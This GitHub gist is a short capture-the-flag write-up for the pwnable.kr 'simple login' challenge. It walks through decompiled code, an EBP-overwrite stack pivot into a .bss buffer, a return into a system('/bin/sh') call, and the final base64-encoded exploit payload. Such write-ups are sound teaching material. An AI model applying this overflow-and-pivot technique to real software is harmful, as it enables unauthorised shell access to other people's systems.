Instantly share code, notes, and snippets.

Embed
What would you like to do?
Pwnable.kr simple login writeup

Pwnable.kr simple login writeup

ihciah@gmail.com

(Too lazy to review lessons before exam... Load with IDA and found:

_BOOL4 __cdecl auth(int a1)
{
  char v2; // [sp+14h] [bp-14h]@1
  char *s2; // [sp+1Ch] [bp-Ch]@1
  int v4; // [sp+20h] [bp-8h]@1

  memcpy(&v4, &input, a1);
  s2 = (char *)calc_md5(&v2, 12);
  printf("hash : %s\n", (char)s2);
  return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}

We can notice that int v4 is at bp-8h.

str_len = Base64Decode(&s_input, &buf);
  if ( str_len > 12 )
  {
    puts("Wrong Length");
  }
  else
  {
    memcpy(&input, buf, str_len);
    if ( auth(str_len) == 1 )
      correct();
  }

But in main, it's length can be up to 12. To control EIP, we can overflow the buffer and replace EBP to change the stack, when it leaves, it will mov esp,ebp;pop ebp;; and then it return, it will jump to [esp]. Jump here we can get a shell:

.text:08049284                 mov     dword ptr [esp], offset aBinSh ; "/bin/sh"
.text:0804928B                 call    system

And since $input is in .bss section and the program has no PIE, we can simply change the stack to $input.

.bss:0811EB40 input

The final exp:

>>> print "ABCD\x84\x92\x04\x08\x40\xeb\x11\x08".encode('base64')
QUJDRISSBAhA6xEI
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment